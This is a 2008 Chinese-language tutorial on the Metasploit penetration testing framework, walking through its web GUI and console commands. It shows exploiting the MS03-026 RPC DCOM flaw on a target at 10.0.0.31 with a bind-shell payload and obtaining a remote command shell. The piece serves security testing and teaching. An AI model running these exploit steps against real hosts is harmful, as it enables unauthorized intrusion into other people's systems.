您的位置:首页 > 编程语言 > ASP

Metasploit渗透工具的应用 推荐

2008-03-07 09:44 323 查看
本文已发表在专家栏:
http://netsecurity.51cto.com/art/200803/66693.htm

【51CTO.com 专家特稿】在文章《Immunity canvas安全检测工具简介》中,叶子对三个安全漏洞检测工具Metasploit、Immunity CANVAS、Core Impact中的ImmunityCANVAS做了简单的安装使用介绍。现在叶子对Metasploit渗透工具的应用也做下说明。本文主要介绍Metasploit的GUI界面的简单使用以及命令行模式下的使用。Metasploit是一款开源的安全漏洞检测工具。由于Metasploit是免费的工具,因此安全工作人员常用Metasploit工具来检测系统的安全性。Metasploit Framework (MSF)是2003年以开放源代码方式发布、可自由获取的开发框架,这个环境为渗透测试、shellcode编写和漏洞研究提供了一个可靠的平台。它集成了各平台上常见的溢出漏洞和流行的shellcode,并且不断更新,最新版本的MSF包含了180多种当前流行的操作系统和应用软件的exploit,以及100多个shellcode。作为安全工具,它在安全检测中起到不容忽视的作用,并为漏洞自动化探测和及时检测系统漏洞提供有力的保障。Metasploit的安装文件可以到官方网站进行下载,目前的版本是3.1。
http://metasploit.com/framework/Metasploit 3的使用:(叶子使用windows系统上的Metasploit 3.0版本)安装完Metasploit程序后,如下图1所示,程序中包含Metasploit的相关文档、常用的一些小工具(Netcat、Putty、VNCViewer、WinVI)、CMD Shell、Metasploit 3的主程序、NASM Shell、上线升级程序、RUBYShell等内容。下面我们开始使用Metasploit进行相关的渗透工作。
498)this.style.width=498;" big(this)" alt="" src="http://netsecurity.51cto.com/files/uploadimg/20080306/1450220.gif" border="0">
图1
1.安装完Metasploit程序,运行Metasploit 3,启动Web窗口界面,如下图2所示。界面中会出现Exploits、Auxiliaries、Payloads、Console、Sessions、About等图标栏。
498)this.style.width=498;" big(this)" alt="" src="http://netsecurity.51cto.com/files/uploadimg/20080306/1450221.gif" border="0">
图2
2.点击Exploits图标,系统列出所有的Exploits。
498)this.style.width=498;" big(this)" alt="" src="http://netsecurity.51cto.com/files/uploadimg/20080306/1450222.gif" border="0">
图3
3.针对目的主机的信息查找相关漏洞利用程序,比如查找Windows 2000系统的相关漏洞利用程序,如下图4所示:
498)this.style.width=498;" big(this)" alt="" src="http://netsecurity.51cto.com/files/uploadimg/20080306/1450223.gif" border="0">
图4
4.利用对主机扫描发现的漏洞信息,找到相关的漏洞利用程序,比如“Microsoft RPC DCOM Interface Overflow”的漏洞利用程序,如下图5所示。选择目的操作系统的种类。
498)this.style.width=498;" big(this)" alt="" src="http://netsecurity.51cto.com/files/uploadimg/20080306/1450224.gif" border="0">
图5
5.选择特定的ShellCode程序,系统攻击成功后,会执行相关的ShellCode的指令内容。比如选择绑定cmd Shell的操作,如下图所示:
498)this.style.width=498;" big(this)" alt="" src="http://netsecurity.51cto.com/files/uploadimg/20080306/1450225.gif" border="0">
图6
6.输入目的主机的IP地址,比如10.0.0.31,然后执行“Launch Exploit”按钮,如下图所示
498)this.style.width=498;" big(this)" alt="" src="http://netsecurity.51cto.com/files/uploadimg/20080306/1450226.gif" border="0">
图7
7.渗透攻击成功后,系统返回cmd shell信息,获取主机系统权限,可以做任何的操作了。如下图所示:
498)this.style.width=498;" big(this)" alt="" src="http://netsecurity.51cto.com/files/uploadimg/20080306/1450227.gif" border="0">
图8
除了使用web窗口模式来工作外,还可以使用MSF的命令模式,以Console平台来工作。◆点击主窗口中的Console图标,如下图所示:
498)this.style.width=498;" big(this)" alt="" src="http://netsecurity.51cto.com/files/uploadimg/20080306/1450228.gif" border="0">
图9
◆输入Help命令,可以看到很多的操作命令,如下图所示。对于我们常用的命令也就是show、info、use、set等几个命令。
“show”:显示规定类型的一种模块或所有模块,比如exploit/payload等
“info”: 显示一种或更多模块的信息
“use”: 选择模块的名字
“set”: 设置变量
498)this.style.width=498;" big(this)" alt="" src="http://netsecurity.51cto.com/files/uploadimg/20080306/1450229.gif" border="0">
图10
◆通过输入“show exploits”指令查看有哪些可用的Exploit程序,如下图所示:
498)this.style.width=498;" big(this)" alt="" src="http://netsecurity.51cto.com/files/uploadimg/20080306/14502210.gif" border="0">
图11
◆输入“show payload”指令,查看有哪些可以加载的ShellCode信息,如下图所示:
498)this.style.width=498;" big(this)" alt="" src="http://netsecurity.51cto.com/files/uploadimg/20080306/14502211.gif" border="0">
图12
◆输入“info exploit/windows/dcerpc/ms03_026_dcom”指令,了解MS03_026_dcom利用程序的相关信息内容,如下图所示:
498)this.style.width=498;" big(this)" alt="" src="http://netsecurity.51cto.com/files/uploadimg/20080306/14502212.gif" border="0">
图13
◆根据了解的MS03_026_dcom的相关信息,使用漏洞利用程序。
输入:use exploit/windows/dcerpc/ms03_026_dcom
查看利用程序需要设置的相关内容
输入:show options
设置攻击目的主机的IP地址
输入:set RHOST 10.0.0.31
设置加载的ShellCode程序
输入:set PAYLOAD generic/shell_bind_tcp
执行利用程序
输入:exploit
系统攻击成功,并获取远程主机的权限,如下图所示:
498)this.style.width=498;" big(this)" alt="" src="http://netsecurity.51cto.com/files/uploadimg/20080306/14502213.gif" border="0">
图14
Metasploit会不定期更新可利用的漏洞程序,可以通过Online Update来进行升级。由于Metasploit是国外的开源组织来维护,所以其中的exploit程序主要是针对国外语言的操作系统。对于中文操作系统的exploit程序,有些还需要进一步的修改。叶子会在以后的文章中来讨论怎样修改Metasploit的exploit程序内容。
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息